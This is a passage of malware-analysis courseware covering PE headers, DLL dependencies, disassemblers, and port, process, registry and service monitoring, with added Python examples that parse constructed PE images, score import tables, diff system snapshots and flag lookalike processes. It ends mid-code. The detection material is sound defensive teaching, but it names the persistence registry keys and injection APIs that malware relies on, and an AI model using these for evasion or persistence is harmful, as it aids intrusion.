Static Malware Analysis: Finding the Portable Executables (PE) Information
Finding the Portable Executables (PE) Information

The Portable Executable (PE) format is an executable file format used on Windows OS, which stores the information that a Windows system requires to manage the executable code. It stores metadata about the program, which helps in finding additional details of the file. For instance, the Windows binary is in PE format, and it consists of information such as time of creation and modification, import and export functions, compilation time, DLLs, linked files, strings, menus, and symbols. The PE format contains a header and sections that store metadata about the file and the mapping of code instructions in the OS. A PE file contains the following sections:

▪ .text: Contains instructions and program code that the CPU executes.
▪ .rdata: Contains import and export information as well as other read-only data used by the program.
▪ .data: Contains the program's global data, which the system can access from anywhere.
▪ .rsrc: Consists of the resources employed by the executable, such as icons, images, menus, and strings; this section also offers multi-lingual support.

You can use the header information to gather additional details of a file or program, such as its features. You can use tools such as PEView to extract the above-mentioned information.
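The fields that PEiD and PEView display (entry point, file offset, EP section, first bytes, linker version, subsystem) all come from the PE header and section table described above, and the packing indicators from the previous topic (packer-specific section names, high-entropy sections) are read from the same structures. The following added example, which is not part of the courseware and not the code of any tool named here, parses those structures from a PE32 image and applies both heuristics. The function names `build_sample_pe`, `parse_pe` and `packing_indicators` are hypothetical, and the two sample images are constructed in memory (they carry headers only and cannot execute); the UPX and ASPack section names are the ones those packers are known to emit.

```python
"""Minimal PE32 header parser with packing heuristics (added example; constructed sample images)."""
import hashlib
import math
import struct
from collections import Counter

OPTIONAL_HEADER_SIZE = 224      # size of a standard PE32 optional header
SECTION_HEADER_SIZE = 40
SUBSYSTEMS = {2: "Windows GUI", 3: "Windows console"}     # IMAGE_SUBSYSTEM_WINDOWS_GUI / _CUI
PACKER_SECTIONS = {"UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX", ".aspack": "ASPack", ".adata": "ASPack"}


def build_sample_pe(sections, entry_rva, subsystem=2):
    """Construct a minimal, non-runnable PE32 image purely for parsing practice.
    sections: list of (name, virtual_address, raw_bytes)."""
    pe_off = 64                                   # e_lfanew: PE signature right after the DOS header
    headers_len = pe_off + 4 + 20 + OPTIONAL_HEADER_SIZE + SECTION_HEADER_SIZE * len(sections)
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", pe_off)       # e_lfanew lives at offset 60
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, OPTIONAL_HEADER_SIZE, 0x0102)
    opt = bytearray(OPTIONAL_HEADER_SIZE)
    struct.pack_into("<HBB", opt, 0, 0x10B, 6, 0)   # PE32 magic, linker version 6.0
    struct.pack_into("<I", opt, 16, entry_rva)      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)       # ImageBase
    struct.pack_into("<H", opt, 68, subsystem)      # Subsystem
    raw_ptr, headers, raw = headers_len, b"", b""
    for name, va, data in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                               len(data), va, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(data)
        raw += data
    return dos + b"PE\x00\x00" + coff + bytes(opt) + headers + raw


def shannon_entropy(data):
    """Bits per byte; values near 8.0 indicate compressed or encrypted content."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image):
    """Return the PEiD-style fields: entry point, file offset, EP section, first bytes,
    linker version, subsystem, plus per-section entropy."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (pe_off,) = struct.unpack_from("<I", image, 60)
    if image[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe_off + 4)
    opt_off = pe_off + 24
    magic, major, minor = struct.unpack_from("<HBB", image, opt_off)
    (entry_rva,) = struct.unpack_from("<I", image, opt_off + 16)
    (subsystem,) = struct.unpack_from("<H", image, opt_off + 68)
    sections = []
    for i in range(nsec):
        off = opt_off + opt_size + i * SECTION_HEADER_SIZE
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawptr": rawptr, "rawsize": rawsize,
                         "entropy": round(shannon_entropy(image[rawptr:rawptr + rawsize]), 2)})
    ep = next((s for s in sections
               if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    ep_file_off = ep["rawptr"] + (entry_rva - ep["va"]) if ep else None
    return {"machine": hex(machine), "pe32plus": magic == 0x20B, "entry_rva": entry_rva,
            "ep_file_offset": ep_file_off, "ep_section": ep["name"] if ep else None,
            "first_bytes": image[ep_file_off:ep_file_off + 4].hex() if ep else None,
            "linker": f"{major}.{minor}", "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
            "sections": sections}


def packing_indicators(info):
    """Heuristics worth checking before selecting an unpacker."""
    hints = []
    for s in info["sections"]:
        if s["name"] in PACKER_SECTIONS:
            hints.append(f"section {s['name']} is characteristic of {PACKER_SECTIONS[s['name']]}")
        if s["entropy"] > 7.0:
            hints.append(f"section {s['name']} has high entropy ({s['entropy']})")
    if info["ep_section"] not in (".text", "CODE"):
        hints.append(f"entry point lies in {info['ep_section']!r}, not in a code section")
    return hints


def sample_unpacked():
    """Constructed: compiler-style layout, entry point at the start of .text."""
    text = b"\x55\x8b\xec" + b"\x90" * 200 + b"\xc3"     # push ebp; mov ebp,esp; nops; ret
    return build_sample_pe([(".text", 0x1000, text), (".rdata", 0x2000, b"Hello, world\x00" * 8),
                            (".data", 0x3000, b"\x00" * 64)], entry_rva=0x1000, subsystem=3)


def sample_packed():
    """Constructed: UPX-style layout with a high-entropy body and the entry point in UPX1."""
    blob, chunk = b"", b"seed"
    for _ in range(128):                 # 4 KiB of hash-chained bytes stands in for packed code
        chunk = hashlib.sha256(chunk).digest()
        blob += chunk
    return build_sample_pe([("UPX0", 0x1000, b""), ("UPX1", 0x5000, blob)], entry_rva=0x5010)


if __name__ == "__main__":
    for label, img in (("unpacked", sample_unpacked()), ("packed", sample_packed())):
        info = parse_pe(img)
        print(label, info["ep_section"], hex(info["ep_file_offset"]), info["first_bytes"],
              info["subsystem"], packing_indicators(info))
```

The entropy threshold (7.0 bits per byte) is a rule of thumb: compressed or encrypted payloads approach 8.0, while compiled code and text sit well below it. A section name match is stronger evidence but easily removed by a custom packer, which is why both checks are applied together.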
▪ PE Explorer
Source: http://www.heaventools.com
PE Explorer lets you open, view, and edit a variety of 32-bit Windows executable file types (also called PE files) ranging from common types, such as EXE, DLL, and ActiveX Controls, to less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL, and more (including executable files that run on the MS Windows Mobile platform).

Figure 7.72: Screenshot of PE Explorer
Some additional PE extraction tools are as follows:
▪ Portable Executable Scanner (pescan) (https://tzworks.net)
▪ Resource Hacker (http://www.angusj.com)
▪ PEView (https://www.aldeid.com)
Static Malware Analysis: Identifying File Dependencies
Identifying File Dependencies

Any software program depends on various inbuilt libraries of an OS that help in performing specified actions in a system. Programs need to work with internal system files to function correctly. They store the import and export functions in a kernel32.dll file. File dependencies contain information about the internal system files that the program needs to function properly, the process of registration, and location on the machine.

You need to find the libraries and file dependencies, as they contain information about the run-time requirements of an application. Subsequently, you need to check whether you can find and analyze these files, as they can provide information about malware in a file. File dependencies include linked libraries, functions, and function calls. Check the dynamically linked list in the malware executable file. Finding out all the library functions may allow you to guess what the malware program can do. You should know the various DLLs used to load and run a program. Some standard DLLs are listed in the table below:

DLL                        | Description of contents
Kernel32.dll               | Core functionality, such as access and manipulation of memory, files, and hardware
Advapi32.dll               | Provides access to advanced core Windows components such as the Service Manager and Registry
User32.dll                 | User-interface components, such as buttons, scrollbars, and components for controlling and responding to user actions
Gdi32.dll                  | Functions for displaying and manipulating graphics
Ntdll.dll                  | Interface to the Windows kernel
WSock32.dll and Ws2_32.dll | Networking DLLs that help to connect to a network or perform network-related tasks
Wininet.dll                | Supports higher-level networking functions

Table 7.5: Standard DLLs

You can use tools such as Dependency Walker to identify the dependencies within the executable file.

▪ Dependency Walker
Source: http://www.dependencywalker.com
The Dependency Walker application lists all the dependent modules of an executable file and builds hierarchical tree diagrams. It also records all the functions of each module's exports and calls. Furthermore, it detects many common problems such as missing and invalid modules, import/export mismatches, circular dependency errors, mismatched machine modules, and module initialization failures.
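Once Dependency Walker (or any import-table viewer) has listed the DLLs and functions a sample imports, the analyst's next step is to turn that list into a statement of capability. The added example below is not part of the courseware and not the output format of Dependency Walker: it maps the standard DLLs from Table 7.5 to their roles, groups a few well-known Win32 API names by the behaviour they enable, and scores combinations, because a sample that can both reach the network and write persistence is more urgent than either alone. The function name `triage_imports` and the two import tables are constructed for illustration; the API grouping is a deliberately short assumption, not an exhaustive rule set.

```python
"""Capability triage from an executable's import table (added example; constructed samples)."""

# What the standard DLLs from Table 7.5 usually imply when they appear in the import table.
DLL_ROLES = {
    "kernel32.dll": "core: memory, files, processes",
    "advapi32.dll": "registry and Service Control Manager access",
    "user32.dll": "user-interface interaction",
    "gdi32.dll": "graphics",
    "ntdll.dll": "direct kernel interface",
    "wsock32.dll": "network sockets",
    "ws2_32.dll": "network sockets",
    "wininet.dll": "higher-level networking (HTTP/FTP)",
}

# Well-known Win32 API names grouped by the behaviour they enable (assumption: a short
# illustrative list, not an exhaustive rule set).
API_GROUPS = {
    "persistence": {"RegSetValueExA", "RegSetValueExW", "CreateServiceA", "CreateServiceW"},
    "injection": {"WriteProcessMemory", "CreateRemoteThread", "VirtualAllocEx"},
    "network": {"InternetOpenA", "InternetOpenUrlA", "WSAStartup", "connect", "send", "recv"},
    "anti-analysis": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"},
}


def triage_imports(imports):
    """imports: {dll: [function, ...]} as Dependency Walker lists them.
    Scores behaviour combinations rather than single imports."""
    dlls = {d.lower() for d in imports}
    behaviours = set()
    for functions in imports.values():
        for group, names in API_GROUPS.items():
            if names & set(functions):
                behaviours.add(group)
    score = len(behaviours)
    if {"network", "persistence"} <= behaviours:   # downloader that also installs itself
        score += 1
    if "injection" in behaviours:                  # hides inside another process
        score += 1
    return {
        "roles": sorted(DLL_ROLES[d] for d in dlls if d in DLL_ROLES),
        "unknown_dlls": sorted(d for d in dlls if d not in DLL_ROLES),
        "behaviours": sorted(behaviours),
        "score": score,
    }


SAMPLE_IMPORTS = {  # constructed import table of a suspicious sample
    "KERNEL32.dll": ["CreateFileA", "WriteProcessMemory", "CreateRemoteThread", "IsDebuggerPresent"],
    "ADVAPI32.dll": ["RegOpenKeyExA", "RegSetValueExA"],
    "WININET.dll": ["InternetOpenA", "InternetOpenUrlA"],
    "customcrypt.dll": ["Encrypt"],
}
BENIGN_IMPORTS = {"KERNEL32.dll": ["CreateFileA", "ReadFile"], "USER32.dll": ["MessageBoxA"]}  # constructed

if __name__ == "__main__":
    for label, table in (("sample", SAMPLE_IMPORTS), ("benign", BENIGN_IMPORTS)):
        print(label, triage_imports(table))
```

An unknown DLL next to the executable (here the constructed customcrypt.dll) is itself worth noting: it is one of the dependent modules Dependency Walker would flag as missing if it was not shipped with the sample.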

Figure 7.73: Screenshot of Dependency Walker
Some additional dependency extraction tools are as follows:
▪ Dependency-check (https://jeremylong.github.io)
▪ Snyk (https://snyk.io)
▪ Hakiri (https://hakiri.io)
▪ Retire.js (https://retirejs.github.io)

Static Malware Analysis: Malware Disassembly
Malware Disassembly

The static analysis also includes the dismantling of a given executable into binary format to study its functionalities and features. This process helps to identify the language used for programming the malware, APIs that reveal its function, etc. Based on the reconstructed assembly code, you can inspect the program logic and recognize its threat potential. This process can be performed using debugging tools such as IDA Pro and OllyDbg.

▪ IDA
Source: https://www.hex-rays.com
IDA Pro is a multi-platform disassembler and debugger that explores binary programs, for which the source code is not always available, to create maps of their execution. It shows the instructions in the same way as a processor executes them, i.e., in a symbolic representation called assembly language. Thus, it is easy for you to find harmful or malicious processes.
Features:
o Disassembler
As a disassembler, IDA Pro explores binary programs, for which the source code is not always available, to create maps of their execution.
o Debugger
The debugger in IDA Pro is an interactive tool that complements the disassembler to perform static analysis in one step. It bypasses the obfuscation process, which helps the assembler to process the hostile code in detail.

Figure 7.74: Screenshot of IDA Pro
Some additional debugging tools are as follows:
▪ Ghidra (https://ghidra-sre.org)
▪ Radare2 (https://rada.re)
▪ OllyDbg (http://www.ollydbg.de)
▪ WinDbg (http://www.windbg.org)
▪ ProcDump (https://docs.microsoft.com)

Dynamic Malware Analysis
Dynamic Malware Analysis

Dynamic malware analysis is the process of studying the behavior of malware by running it in a monitored environment. This type of analysis requires a safe environment, such as virtual machines and sandboxes, to deter the malware from spreading. The environment design should include tools that can capture every movement of the malware in detail and provide relevant feedback. Typically, virtual systems act as a base for conducting such experiments.

Dynamic analysis is performed to gather valuable information about malware activity, including files and folders created, ports and URIs accessed, functions and libraries called, applications and tools accessed, information transferred, settings modified, processes and services started by the malware, etc.

You should design and set up the environment for performing the dynamic analysis such that the malware cannot propagate to the production network and the testing system is capable of recovering from a previously set timeframe in case anything goes wrong during the test. To achieve this, the investigator needs to do the following:

▪ System Baselining
System baselining refers to the process of capturing the system state (taking a snapshot of the system) when the malware analysis begins, which can be compared with the system's state after executing the malware file. This will help to understand the changes the malware has made across the system. System baselining includes recording details of the file system, registry, open ports, network activity, etc.

▪ Host Integrity Monitoring
Host integrity monitoring is the process of studying the changes that have taken place across a system or machine after a series of actions or incidents. It involves taking snapshots of the system before and after the incident or action using the same tools and analyzing the changes to evaluate the impact on the system and its properties.
In malware analysis, host integrity monitoring helps to understand the runtime behavior of a malware file as well as its activities, propagation techniques, URLs accessed, downloads initiated, etc.
Host integrity monitoring includes the following:
o Port Monitoring
o Process Monitoring
o Registry Monitoring
o Windows Services Monitoring
o Startup Programs Monitoring
o Event Logs Monitoring/Analysis
o Installation Monitoring
o Files and Folders Monitoring
o Device Drivers Monitoring
o Network Traffic Monitoring/Analysis
o DNS Monitoring/Resolution
o API Calls Monitoring
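The baselining and host integrity monitoring steps above amount to one operation: record the same categories of system state before and after execution with the same tools, then diff them. The added example below (not part of the courseware and not the code of any tool named here) does that for four of the categories listed: listening ports, processes, services, autorun entries, and file hashes. Both snapshots are constructed in-line, the function names `diff_snapshot` and `findings` are hypothetical, and the hash values are placeholders; in practice each category would be filled by the tools covered in the following top
ics (netstat/TCPView, Process Monitor, SrvMan, Autoruns, a file integrity checker).

```python
"""Diff a pre-execution baseline against a post-execution snapshot (added example; constructed data)."""


def diff_snapshot(before, after):
    """Both snapshots are {category: {key: value}}; returns only the categories that changed."""
    report = {}
    for category in sorted(set(before) | set(after)):
        b, a = before.get(category, {}), after.get(category, {})
        added = {k: a[k] for k in a.keys() - b.keys()}
        removed = {k: b[k] for k in b.keys() - a.keys()}
        changed = {k: (b[k], a[k]) for k in a.keys() & b.keys() if a[k] != b[k]}
        if added or removed or changed:
            report[category] = {"added": added, "removed": removed, "changed": changed}
    return report


def findings(report):
    """Analyst-facing observations drawn from the diff, most actionable first."""
    out = []
    for key in report.get("listening_ports", {}).get("added", {}):
        out.append(f"new listening port {key}")
    for category in ("services", "autoruns"):
        for key in report.get(category, {}).get("added", {}):
            out.append(f"new persistence via {category}: {key}")
    for path, (old, new) in report.get("files", {}).get("changed", {}).items():
        out.append(f"modified file {path} ({old} -> {new})")
    for key, image in report.get("processes", {}).get("added", {}).items():
        if "\\appdata\\" in image.lower() or "\\temp\\" in image.lower():
            out.append(f"new process from user-writable path: {key} ({image})")
    return out


RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SVCHOST = r"C:\Windows\System32\svchost.exe"
ONEDRIVE = r"C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
HOSTS = r"C:\Windows\System32\drivers\etc\hosts"

BASELINE = {  # constructed clean snapshot taken before the sample runs; hashes are placeholders
    "listening_ports": {"tcp/135": "svchost.exe", "tcp/445": "System"},
    "processes": {"4:System": "", "612:svchost.exe": SVCHOST},
    "services": {"Spooler": "running"},
    "autoruns": {RUN_KEY + r"\OneDrive": ONEDRIVE},
    "files": {HOSTS: "sha256:1111aaaa (constructed)"},
}
AFTER = {  # constructed snapshot taken after execution
    "listening_ports": {"tcp/135": "svchost.exe", "tcp/445": "System", "tcp/8081": "updater.exe"},
    "processes": {"4:System": "", "612:svchost.exe": SVCHOST,
                  "3120:updater.exe": r"C:\Users\lab\AppData\Roaming\updater.exe"},
    "services": {"Spooler": "running", "WinUpdSvc": "running"},
    "autoruns": {RUN_KEY + r"\OneDrive": ONEDRIVE,
                 RUN_KEY + r"\Updater": r"C:\Users\lab\AppData\Roaming\updater.exe"},
    "files": {HOSTS: "sha256:2222bbbb (constructed)"},
}

if __name__ == "__main__":
    for line in findings(diff_snapshot(BASELINE, AFTER)):
        print(line)
```

Keys are chosen so that the same system object maps to the same key in both runs (process key is pid plus name, port key is protocol plus port); without stable keys every reboot would look like a change.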

Dynamic Malware Analysis: Port Monitoring
Port Monitoring

Malware programs corrupt the system and open system input/output ports to establish connections with remote systems, networks, or servers to accomplish various malicious tasks. These open ports can also form backdoors for other types of harmful malware and programs. Open ports act as communication channels for malware. They open unused ports on the victim's machine to connect back to the malware handlers. Scanning for suspicious ports will help in identifying such malware.

You can also determine whether malware is trying to access a particular port during dynamic analysis by installing port monitoring tools such as TCPView and Windows command-line utility tools such as netstat. These port monitoring tools provide details such as the protocol used, local address, remote address, and state of the connection. Additional features may include process name, process ID, remote connection protocol, etc.

▪ Netstat
It displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP, and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays only active TCP connections.
Syntax
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
Parameters
o -a: Displays all active TCP connections and the TCP and UDP ports on which the computer is listening.
o -e: Displays Ethernet statistics, such as the number of bytes and packets sent and received. This parameter can be combined with -s.
o -n: Displays active TCP connections; however, addresses and port numbers are expressed numerically, and no attempt is made to determine names.
o -o: Displays active TCP connections and includes the process ID (PID) for each connection. You can find the application based on the PID in the Processes tab in Windows Task Manager. This parameter can be combined with -a, -n, and -p.
o -p Protocol: Shows connections for the protocol specified by Protocol. In this case, Protocol can be tcp, udp, tcpv6, or udpv6. If this parameter is used with -s to display statistics by protocol, Protocol can be tcp, udp, icmp, ip, tcpv6, udpv6, icmpv6, or ipv6.
o -s: Displays statistics by protocol. By default, statistics are shown for the TCP, UDP, ICMP, and IP protocols. If the IPv6 protocol for Windows XP is installed, statistics are shown for the TCP over IPv6, UDP over IPv6, ICMPv6, and IPv6 protocols. The -p parameter can be used to specify a set of protocols.
o -r: Displays the contents of the IP routing table. This is equivalent to the route print command.

In the image below, the command netstat -an displays all the active TCP connections as well as the TCP and UDP ports on which the computer is listening along with the addresses and port numbers.

Figure 7.75: Screenshot of Netstat
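Combining the -a, -n and -o parameters described above gives every endpoint with its owning PID, which is the listing an analyst compares against the pre-execution baseline. The added example below is not part of the courseware: it parses the column layout of `netstat -ano` from a constructed sample (the State column is empty for UDP rows, and IPv6 addresses are bracketed, both of which the parser handles), then reports what the sample's PID opened, which listeners are new relative to the baseline, and which outbound connections go to ports outside the set this lab treats as ordinary. The names `parse_netstat`, `review`, the baseline set and the "ordinary ports" set are all assumptions made for the example.

```python
"""Parse `netstat -ano` output and review it against a lab baseline (added example; constructed sample)."""
import re
from dataclasses import dataclass

# One row per endpoint; the State column is absent for UDP, hence the optional group.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+([A-Z_]+))?\s+(\d+)\s*$")

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.56.101:49712   203.0.113.10:443       ESTABLISHED     2244
  TCP    192.168.56.101:49713   198.51.100.7:6667      ESTABLISHED     3120
  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING       3120
  TCP    [::]:135               [::]:0                 LISTENING       892
  UDP    0.0.0.0:5355           *:*                                    1420
"""  # constructed output; PID 3120 is the sample under analysis


@dataclass
class Endpoint:
    proto: str
    local_ip: str
    local_port: str
    remote_ip: str
    remote_port: str
    state: str
    pid: int


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                                # title, header and blank lines
            continue
        proto, local, remote, state, pid = m.groups()
        lip, lport = local.rsplit(":", 1)        # rsplit keeps IPv6 "[::]:135" intact
        rip, rport = remote.rsplit(":", 1)
        rows.append(Endpoint(proto, lip, lport, rip, rport, state or "", int(pid)))
    return rows


COMMON_REMOTE_PORTS = {"80", "443", "53"}   # assumption: what this lab treats as ordinary egress
BASELINE_LISTENERS = {("TCP", "135"), ("TCP", "445"), ("UDP", "5355")}   # constructed clean baseline


def review(rows, baseline_listeners, subject_pid):
    """What the sample's PID opened, listeners not in the baseline, and outbound
    connections to ports outside the ordinary set."""
    listeners = {(r.proto, r.local_port) for r in rows if r.state == "LISTENING" or r.proto == "UDP"}
    return {
        "subject_endpoints": [
            f"{r.proto} {r.local_ip}:{r.local_port} -> {r.remote_ip}:{r.remote_port} {r.state}".rstrip()
            for r in rows if r.pid == subject_pid],
        "new_listeners": sorted(listeners - set(baseline_listeners)),
        "unusual_outbound": [(r.pid, f"{r.remote_ip}:{r.remote_port}") for r in rows
                             if r.state == "ESTABLISHED" and r.remote_port not in COMMON_REMOTE_PORTS],
    }


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for k, v in review(rows, BASELINE_LISTENERS, 3120).items():
        print(k, v)
```

The PID column is what ties a listener back to a process in Task Manager or Process Monitor; without -o the same listening port would have to be attributed by timing alone.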

▪ TCPView
Source: https://docs.microsoft.com
TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses, and the state of the TCP connections. It provides a subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions.

Figure 7.76: Screenshot of TCPView
Some additional port monitoring tools are as follows:
▪ Port Monitor (https://www.port-monitor.com)
▪ CurrPorts (https://www.nirsoft.net)
▪ TCP Port Monitoring (https://www.dotcom-monitor.com)
▪ PortExpert (http://www.kcsoftwares.com)
▪ PRTG Network Monitor (https://www.paessler.com)

Dynamic Malware Analysis: Process Monitoring

Process Monitoring

Malware enters the system through images, music files, videos, etc., which are downloaded from the Internet, camouflages itself as genuine Windows services, and hides its processes to avoid detection. Some malware uses PEs to inject itself into various processes (such as explorer.exe or web browsers). Malicious processes are visible but appear legitimate; hence, they can bypass desktop firewalls. Attackers use specific rootkit methods to hide malware in the system so that the antivirus software cannot detect it easily.

Process monitoring helps in understanding the processes that the malware initiates and takes over after execution. It is also necessary to observe the child processes, associated handles, loaded libraries, functions, and execution flow of boot time processes to define the entire nature of a file or program, gather information about the processes running before the execution of the malware, and compare them with the processes running after execution. This method will reduce the time taken to analyze all the processes and help in easy identification of the processes that the malware starts. Use process-monitoring tools such as Process Monitor to detect suspicious processes.

▪ Process Monitor
Source: https://docs.microsoft.com
Process Monitor is a monitoring tool for Windows that shows real-time file system, registry, and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon, and adds an extensive list of enhancements, including rich and non-destructive filtering, comprehensive event properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, and so on. The unique features of Process Monitor make it a core utility in system troubleshooting and malware hunting toolkits.
Features:
o More data captured for operation input and output parameters.
o Non-destructive filters that can be set without losing data.
o Capture of thread stacks for each operation makes it possible to identify the cause of an operation in many cases.
o Reliable capture of process details, including image path, command line, user, and session ID.
o Configurable and moveable columns for any event property.
o Filters can be set for any data field, including fields not configured as columns.
o Advanced logging architecture scales to tens of millions of captured events and gigabytes of log data.
o Process tree tool shows the relationships of all processes referenced in a trace.
o Native log format preserves all data for loading in a different Process Monitor instance.

Figure 7.77: Screenshot of Process Monitor
Some additional process monitoring tools are as follows:
▪ Process Explorer (https://docs.microsoft.com)
▪ OpManager (https://www.manageengine.com)
▪ Monit (https://mmonit.com)
▪ ESET SysInspector (https://www.eset.com)
▪ System Explorer (http://systemexplorer.net)

Dynamic Malware Analysis: Registry Monitoring
Registry Monitoring

The Windows registry stores OS and program configuration details, such as settings and options. If the malware is a program, the registry stores its functionality. The malware uses the registry to perform harmful activity continuously by storing entries in the registry and ensuring that the malicious program runs automatically whenever the computer or device boots.

When an attacker installs malware on the victim's machine, it generates a registry entry. Consequently, various changes will be noticed, such as the system becoming slower, various advertisements popping up, and so on.

Windows automatically executes instructions in the following sections of the registry:
▪ Run
▪ RunServices
▪ RunOnce
▪ RunServicesOnce
▪ HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*

Malware inserts instructions in these sections of the registry to perform malicious activities. You should have fair knowledge of the Windows registry, its contents, and inner workings to analyze the presence of malware. Scanning for suspicious registry entries will help to detect malware. Use registry monitoring tools such as RegScanner to scan registry values for any suspicious entries that may indicate malware infection.

▪ jv16 PowerTools
Source: https://www.macecraft.com
jv16 PowerTools is a PC system utility software that works by erasing unnecessary files and data, cleaning the Windows registry, automatically fixing system errors, and optimizing your system. It allows you to scan and monitor the registry. It helps in detecting registry entries created by the malware. The "Clean And Speedup My Computer" feature of Registry Cleaner in jv16 PowerTools is a solution for fixing registry errors and system errors and cleaning registry leftovers and unnecessary files such as old log files and temporary files.

Figure 7.78: Screenshot of jv16 PowerTools
Some additional registry monitoring tools are as follows:
▪ regshot (https://sourceforge.net)
▪ Reg Organizer (https://www.chemtable.com)
▪ Registry Viewer (https://accessdata.com)
▪ RegScanner (https://www.nirsoft.net)
▪ Registrar Registry Manager (https://www.resplendence.com)
Dynamic Malware Analysis: Windows Services Monitoring
Windows Services Monitoring

Attackers design malware and other malicious code such that they install and run on a computer in the form of services. As most services run in the background to support processes and applications, the malicious services are invisible even when they are performing harmful activities in the system, and they can function without intervention or input. Malware spawns Windows services that allow attackers to remotely control the victim's machine and pass malicious instructions. Malware may also adopt rootkit techniques to manipulate the following registry key to hide their processes and services.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
These malicious services run as a SYSTEM account or other privileged accounts, which provide greater access compared to user accounts, making them more dangerous than common malware and executable code. Attackers also try to conceal their actions by naming the malicious services with names similar to genuine Windows services to avoid detection.

You can trace malicious services initiated by the suspicious file during dynamic analysis using Windows service monitoring tools such as Windows Service Manager (SrvMan), which can detect changes in services and scan for suspicious Windows services.

▪ Windows Service Manager (SrvMan)
Source: http://tools.sysprogs.org
SrvMan has both GUI and command-line modes. It can also be used to run arbitrary Win32 applications as services (when such a service is stopped, the main application window is automatically closed).
You can use SrvMan's command-line interface to perform the following tasks:
o Create services
srvman.exe add <file.exe/file.sys> [service name] [display name] [/type:<service type>] [/start:<start mode>] [/interactive:no] [/overwrite:yes]
o Delete services
srvman.exe delete <service name>
o Start/stop/restart services
srvman.exe start <service name> [/nowait] [/delay:<delay in msec>]
srvman.exe stop <service name> [/nowait] [/delay:<delay in msec>]
srvman.exe restart <service name> [/delay:<delay in msec>]
o Install and start a legacy driver with a single call
srvman.exe run <driver.sys> [service name] [/copy:yes] [/overwrite:no] [/stopafter:<msec>]
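The process monitoring topic describes malware camouflaging itself as genuine Windows processes, and this topic describes services given names similar to genuine Windows services and run as SYSTEM; both call for the same check, so one added example serves both passages. It is not part of the courseware and not the code of Process Monitor or SrvMan: given a constructed process inventory and a constructed service inventory (the shape a tool like SrvMan or Process Explorer would export), it flags known process names running from the wrong folder, names that closely resemble a known one (difflib similarity, so single-character swaps such as a zero for an "o" are caught), and services that run as LocalSystem from a user-writable path. The reference lists `KNOWN_PROCESSES` and `KNOWN_SERVICES` are deliberately short assumptions; a real baseline would be taken from a clean image of the same Windows build.

```python
"""Spot processes and services that imitate Windows components (added example; constructed inventory)."""
import difflib
import ntpath

# Assumption: a short reference list; a real baseline comes from a clean image of the same build.
KNOWN_PROCESSES = {"svchost.exe": r"c:\windows\system32", "lsass.exe": r"c:\windows\system32",
                   "csrss.exe": r"c:\windows\system32", "explorer.exe": r"c:\windows"}
KNOWN_SERVICES = {"Spooler", "WinDefend", "wuauserv", "BITS", "Schedule"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def lookalike(name, known, cutoff=0.8):
    """Closest known name when `name` is not itself known but resembles one (svch0st, lsasss, ...)."""
    if name in known:
        return None
    match = difflib.get_close_matches(name, list(known), n=1, cutoff=cutoff)
    return match[0] if match else None


def review_processes(procs):
    """procs: [{"pid", "name", "image"}] as Process Monitor or Process Explorer would list them."""
    findings = []
    for p in procs:
        name = p["name"].lower()
        folder = ntpath.dirname(p["image"]).lower()
        if name in KNOWN_PROCESSES and folder != KNOWN_PROCESSES[name]:
            findings.append(f"pid {p['pid']}: {p['name']} runs from unexpected path {p['image']}")
        else:
            alias = lookalike(name, KNOWN_PROCESSES)
            if alias:
                findings.append(f"pid {p['pid']}: {p['name']} resembles {alias}")
    return findings


def review_services(services):
    """services: [{"name", "binary", "account"}] as read from HKLM\\System\\CurrentControlSet\\Services."""
    findings = []
    for s in services:
        alias = lookalike(s["name"], KNOWN_SERVICES)
        if alias:
            findings.append(f"service {s['name']} resembles {alias}")
        folder = ntpath.dirname(s["binary"]).lower() + "\\"
        if any(tag in folder for tag in USER_WRITABLE) and s["account"].lower() == "localsystem":
            findings.append(f"service {s['name']} runs as LocalSystem from user-writable path {s['binary']}")
    return findings


PROCESSES = [  # constructed inventory
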